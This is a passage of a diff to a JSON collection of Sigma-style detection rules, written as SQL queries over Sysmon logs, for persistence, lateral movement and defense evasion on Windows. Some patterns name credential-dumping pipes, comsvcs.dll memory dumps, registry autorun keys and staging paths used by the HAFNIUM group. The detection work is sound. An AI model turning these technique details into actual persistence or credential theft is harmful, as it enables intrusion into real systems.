MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File 
Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": "Florian Roth (Nextron Systems)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "status": "experimental", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE 
'%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_disallowrun_execution.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using 
\"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - 
"Legitimate Administrator activity" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((Details = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the 
creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' 
ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ], - "falsepositives": [ - "Legitimate Administrator using tool for password recovery" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" - ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" - }, - { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - 
"attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE 